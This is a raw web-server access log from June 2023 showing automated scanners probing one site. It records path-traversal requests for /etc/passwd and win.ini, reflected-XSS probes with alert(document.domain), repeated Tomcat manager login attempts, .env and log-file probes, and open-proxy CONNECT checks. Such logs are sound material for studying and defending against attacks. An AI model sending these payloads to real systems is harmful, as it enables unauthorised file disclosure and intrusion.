103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:30 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:33 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
103.145.191.109 - - [17/Jun/2023:10:15:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:10:17:37 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:10:18:38 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:20:46 +0530] "GET /index.php?controller=../../../../../../../../../etc/passwd&option=com_omphotogallery HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:10:20:47 +0530] "GET /index.php?controller=../../../../../../../../../etc/passwd&option=com_omphotogallery HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:10:21:55 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:22:23 +0530] "POST /cgibin/webproc HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:10:22:24 +0530] "POST /cgibin/webproc HTTP/1.1" 404 1022
41.186.73.134 - - [17/Jun/2023:10:22:56 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:23:52 +0530] "GET /.env HTTP/1.1" 404 1002
107.189.31.184 - - [17/Jun/2023:10:23:52 +0530] "GET /.env HTTP/1.1" 404 1002
90.151.171.108 - - [17/Jun/2023:10:23:57 +0530] "CONNECT v4.ident.me:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:10:23:57 +0530] "CONNECT checkip.amazonaws.com:443 HTTP/1.1" 400 -
90.151.171.108 - - [17/Jun/2023:10:24:02 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:10:24:03 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:10:24:08 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:10:24:08 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.108 - - [17/Jun/2023:10:24:13 +0530] "-" 400 -
90.151.171.108 - - [17/Jun/2023:10:24:13 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:10:24:21 +0530] "GET /microstrategy7/Login.asp?Msg=%22%3E%3Cscript%3Ealert(/2RHou4YsHPmb1qnDkn5qAoNYfwh/)%3B%3C%2Fscript%3E%3C&Port=0&Project=Project001&Server=Server001&Uid=Uid001 HTTP/1.1" 404 1042
107.189.31.184 - - [17/Jun/2023:10:24:22 +0530] "GET /microstrategy7/Login.asp?Msg=%22%3E%3Cscript%3Ealert(/2RHou4YsHPmb1qnDkn5qAoNYfwh/)%3B%3C%2Fscript%3E%3C&Port=0&Project=Project001&Server=Server001&Uid=Uid001 HTTP/1.1" 404 1042
193.35.18.54 - - [17/Jun/2023:10:25:17 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:10:25:25 +0530] "GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 404 1202
107.189.31.184 - - [17/Jun/2023:10:25:26 +0530] "GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 404 1202
107.189.31.184 - - [17/Jun/2023:10:25:27 +0530] "GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 404 1248
107.189.31.184 - - [17/Jun/2023:10:25:28 +0530] "GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1" 404 1248
107.189.31.184 - - [17/Jun/2023:10:25:29 +0530] "GET /wp-content/themes/haberadam/api/mobile-info.php?id HTTP/1.1" 404 1088
107.189.31.184 - - [17/Jun/2023:10:25:30 +0530] "GET /wp-content/themes/haberadam/api/mobile-info.php?id HTTP/1.1" 404 1088
107.189.31.184 - - [17/Jun/2023:10:25:31 +0530] "GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:10:25:33 +0530] "GET /blog/wp-content/themes/haberadam/api/mobile-info.php?id HTTP/1.1" 404 1098
107.189.31.184 - - [17/Jun/2023:10:25:58 +0530] "GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1128
107.189.31.184 - - [17/Jun/2023:10:25:59 +0530] "GET /wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1128
41.186.73.134 - - [17/Jun/2023:10:26:11 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:26:36 +0530] "GET /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1052
107.189.31.184 - - [17/Jun/2023:10:26:37 +0530] "GET /i3geo/exemplos/codemirror.php?pagina=../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1052
41.186.73.134 - - [17/Jun/2023:10:27:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:28:40 +0530] "GET /roundcube/logs/sendmail HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:10:28:41 +0530] "GET /roundcube/logs/sendmail HTTP/1.1" 404 1040
107.189.31.184 - - [17/Jun/2023:10:28:42 +0530] "GET /roundcube/logs/errors.log HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:10:28:43 +0530] "GET /roundcube/logs/errors.log HTTP/1.1" 404 1044
107.189.31.184 - - [17/Jun/2023:10:29:43 +0530] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:10:29:44 +0530] "GET /img.php?f=/./etc/./passwd HTTP/1.1" 404 1008
41.186.73.134 - - [17/Jun/2023:10:30:32 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:10:31:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:10:35:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:10:36:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:37:15 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:10:37:16 +0530] "GET /nagiosxi/login.php HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:10:37:22 +0530] "POST /?s=index/index/index HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:10:37:23 +0530] "POST /?s=index/index/index HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:10:38:35 +0530] "GET null null" 400 -
107.189.31.184 - - [17/Jun/2023:10:38:36 +0530] "GET null null" 400 -
41.186.73.134 - - [17/Jun/2023:10:39:31 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:10:40:40 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:41:19 +0530] "POST /fcgi-bin/wgsetcgi HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:10:41:19 +0530] "POST /fcgi-bin/wgsetcgi HTTP/1.1" 404 1028
107.189.31.184 - - [17/Jun/2023:10:43:56 +0530] "GET /installer HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:10:43:56 +0530] "GET /installer HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:10:44:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:44:16 +0530] "GET /authenticate HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:10:44:16 +0530] "GET /authenticate HTTP/1.1" 404 1018
41.186.73.134 - - [17/Jun/2023:10:45:05 +0530] "GET /manager/html HTTP/1.1" 401 2473
198.235.24.48 - - [17/Jun/2023:10:45:50 +0530] "GET / HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:10:47:29 +0530] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:10:47:29 +0530] "GET /misc.php?action=showpopups&type=friend HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:10:48:00 +0530] "GET /wp-content/plugins/elementor/readme.txt HTTP/1.1" 404 1072
107.189.31.184 - - [17/Jun/2023:10:48:01 +0530] "GET /wp-content/plugins/elementor/readme.txt HTTP/1.1" 404 1072
41.186.73.134 - - [17/Jun/2023:10:48:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:10:49:19 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:10:50:26 +0530] "CONNECT fingerprints.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:10:50:26 +0530] "CONNECT check.best-proxies.ru:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:10:50:26 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:10:50:26 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:10:50:31 +0530] "GET /ip?Z78909657371Q1 HTTP/1.1" 404 998
90.151.171.106 - - [17/Jun/2023:10:50:31 +0530] "GET /ip.php?Z70629657371Q1 HTTP/1.1" 404 1006
90.151.171.106 - - [17/Jun/2023:10:50:31 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:10:50:31 +0530] "-" 400 -
107.189.31.184 - - [17/Jun/2023:10:51:38 +0530] "GET /?q=user/login HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:10:51:39 +0530] "GET /?q=user/login HTTP/1.1" 200 11250
41.186.73.134 - - [17/Jun/2023:10:52:36 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:52:50 +0530] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:10:52:50 +0530] "POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:10:52:51 +0530] "GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:10:52:53 +0530] "GET /index.php?r=i/../../../../../etc/passwd HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:10:53:05 +0530] "GET /api/v1/GetSrc HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:10:53:06 +0530] "GET /api/v1/GetSrc HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:10:53:07 +0530] "GET /api/v1/GetDevice HTTP/1.1" 404 1026
107.189.31.184 - - [17/Jun/2023:10:53:09 +0530] "GET /api/v1/GetDevice HTTP/1.1" 404 1026
41.186.73.134 - - [17/Jun/2023:10:53:50 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:54:39 +0530] "GET /wp-admin HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:10:54:40 +0530] "GET /wp-admin HTTP/1.1" 404 1010
107.189.31.184 - - [17/Jun/2023:10:55:28 +0530] "GET /wp-content/plugins/avchat-3/index_popup.php?FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1080
107.189.31.184 - - [17/Jun/2023:10:55:28 +0530] "GET /wp-content/plugins/avchat-3/index_popup.php?FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1080
41.186.73.134 - - [17/Jun/2023:10:57:06 +0530] "GET /manager/html HTTP/1.1" 401 2473
198.98.53.107 - - [17/Jun/2023:10:57:43 +0530] "CONNECT www.baidu.com:443 HTTP/1.1" 400 -
46.174.191.32 - - [17/Jun/2023:10:58:09 +0530] "GET / HTTP/1.0" 200 11230
41.186.73.134 - - [17/Jun/2023:10:58:14 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:10:59:04 +0530] "GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:10:59:05 +0530] "GET /?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 11250
45.128.232.141 - - [17/Jun/2023:10:59:57 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:11:00:47 +0530] "GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:11:00:50 +0530] "GET /src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1032
107.189.31.184 - - [17/Jun/2023:11:00:50 +0530] "GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:11:00:52 +0530] "GET /src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:11:00:53 +0530] "GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search&what=x&where=BODY HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:11:00:54 +0530] "GET /src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search&what=x&where=BODY HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:11:00:55 +0530] "GET /src/search.php?mailbox=INBOX&submit=Search&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:11:00:56 +0530] "GET /src/search.php?mailbox=INBOX&submit=Search&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:11:00:58 +0530] "GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:11:00:58 +0530] "GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1018
193.35.18.54 - - [17/Jun/2023:11:01:04 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:11:01:06 +0530] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 1030
107.189.31.184 - - [17/Jun/2023:11:01:06 +0530] "GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1" 404 1030
41.186.73.134 - - [17/Jun/2023:11:01:27 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:11:02:29 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:04:06 +0530] "GET /?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:11:04:06 +0530] "GET /?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:11:04:08 +0530] "GET /atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:11:04:08 +0530] "GET /atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1008
107.189.31.184 - - [17/Jun/2023:11:04:10 +0530] "GET /atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:11:04:11 +0530] "GET /atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1024
107.189.31.184 - - [17/Jun/2023:11:05:14 +0530] "POST /wp-login.php?wlcms-action=preview HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:11:05:15 +0530] "POST /wp-login.php?wlcms-action=preview HTTP/1.1" 404 1018
41.186.73.134 - - [17/Jun/2023:11:05:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:11:06:54 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:09:45 +0530] "GET /rest/api/latest/groupuserpicker?maxResults=50000&query=1&showAvatar=true HTTP/1.1" 404 1056
107.189.31.184 - - [17/Jun/2023:11:09:46 +0530] "GET /rest/api/latest/groupuserpicker?maxResults=50000&query=1&showAvatar=true HTTP/1.1" 404 1056
41.186.73.134 - - [17/Jun/2023:11:10:01 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:11:11:03 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:11:42 +0530] "GET /manage/wizard/ HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:11:11:42 +0530] "GET /manage/wizard/ HTTP/1.1" 404 1022
107.189.31.184 - - [17/Jun/2023:11:12:26 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_gadgetfactory HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:11:12:28 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_gadgetfactory HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:11:12:34 +0530] "GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:11:12:34 +0530] "GET /index.jsp?operatorlocale=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 11250
107.189.31.184 - - [17/Jun/2023:11:12:54 +0530] "GET /(download)/etc/passwd HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:11:12:54 +0530] "GET /(download)/etc/passwd HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:11:13:12 +0530] "GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1" 404 1038
107.189.31.184 - - [17/Jun/2023:11:13:13 +0530] "GET /horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00 HTTP/1.1" 404 1038
41.186.73.134 - - [17/Jun/2023:11:14:13 +0530] "GET /manager/html HTTP/1.1" 401 2473
90.151.171.106 - - [17/Jun/2023:11:15:08 +0530] "CONNECT ip.bablosoft.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:11:15:08 +0530] "CONNECT eth0.me:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:11:15:08 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:11:15:08 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:11:15:08 +0530] "GET /?Z78909657371Q1 HTTP/1.1" 200 11250
90.151.171.106 - - [17/Jun/2023:11:15:08 +0530] "GET /?Z70629657371Q1 HTTP/1.1" 200 11250
45.128.232.67 - - [17/Jun/2023:11:15:13 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
90.151.171.106 - - [17/Jun/2023:11:15:13 +0530] "-" 400 -
90.151.171.106 - - [17/Jun/2023:11:15:13 +0530] "-" 400 -
41.186.73.134 - - [17/Jun/2023:11:15:16 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:16:52 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
107.189.31.184 - - [17/Jun/2023:11:16:53 +0530] "GET /etc/passwd HTTP/1.1" 404 1014
41.186.73.134 - - [17/Jun/2023:11:18:34 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:11:19:39 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:21:20 +0530] "POST /AurallRECMonitor/services/svc-login.php HTTP/1.1" 404 1072
107.189.31.184 - - [17/Jun/2023:11:21:20 +0530] "POST /AurallRECMonitor/services/svc-login.php HTTP/1.1" 404 1072
107.189.31.184 - - [17/Jun/2023:11:21:33 +0530] "GET /api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml HTTP/1.1" 404 1222
107.189.31.184 - - [17/Jun/2023:11:21:33 +0530] "GET /api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml HTTP/1.1" 404 1222
107.189.31.184 - - [17/Jun/2023:11:22:07 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_mmsblog HTTP/1.1" 404 1012
107.189.31.184 - - [17/Jun/2023:11:22:08 +0530] "GET /index.php?controller=../../../../../../../../../../etc/passwd%00&option=com_mmsblog HTTP/1.1" 404 1012
41.186.73.134 - - [17/Jun/2023:11:22:49 +0530] "GET /manager/html HTTP/1.1" 401 2473
45.128.232.141 - - [17/Jun/2023:11:22:58 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
41.186.73.134 - - [17/Jun/2023:11:23:51 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:25:31 +0530] "POST /admin/login/?next=/admin/ HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:11:25:32 +0530] "POST /admin/login/?next=/admin/ HTTP/1.1" 404 1018
107.189.31.184 - - [17/Jun/2023:11:25:35 +0530] "GET /wd/hub HTTP/1.1" 404 1006
107.189.31.184 - - [17/Jun/2023:11:25:35 +0530] "GET /wd/hub HTTP/1.1" 404 1006
41.186.73.134 - - [17/Jun/2023:11:27:00 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:11:28:02 +0530] "GET /manager/html HTTP/1.1" 401 2473
87.120.88.59 - - [17/Jun/2023:11:28:56 +0530] "CONNECT google.com:443 HTTP/1.1" 400 -
107.189.31.184 - - [17/Jun/2023:11:29:04 +0530] "GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:11:29:04 +0530] "GET /log?type=%22%3C/script%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3Cscript%3E HTTP/1.1" 404 1000
107.189.31.184 - - [17/Jun/2023:11:31:19 +0530] "GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1016
107.189.31.184 - - [17/Jun/2023:11:31:20 +0530] "GET /tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1016
41.186.73.134 - - [17/Jun/2023:11:31:22 +0530] "GET /manager/html HTTP/1.1" 401 2473
41.186.73.134 - - [17/Jun/2023:11:32:28 +0530] "GET /manager/html HTTP/1.1" 401 2473
107.189.31.184 - - [17/Jun/2023:11:32:33 +0530] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 404 1362
107.189.31.184 - - [17/Jun/2023:11:32:33 +0530] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 404 1362
107.189.31.184 - - [17/Jun/2023:11:32:47 +0530] "GET /_vti_inf.html HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:11:32:48 +0530] "GET /_vti_inf.html HTTP/1.1" 404 1020
107.189.31.184 - - [17/Jun/2023:11:33:44 +0530] "GET /pages/ajax.render.php?dashboard_id=1&layout_class=DashboardLayoutOneCol&operation=render_dashboard&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:11:33:44 +0530] "GET /pages/ajax.render.php?dashboard_id=1&layout_class=DashboardLayoutOneCol&operation=render_dashboard&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1" 404 1036
107.189.31.184 - - [17/Jun/2023:11:33:49 +0530] "GET /behat.yml HTTP/1.1" 404 1012
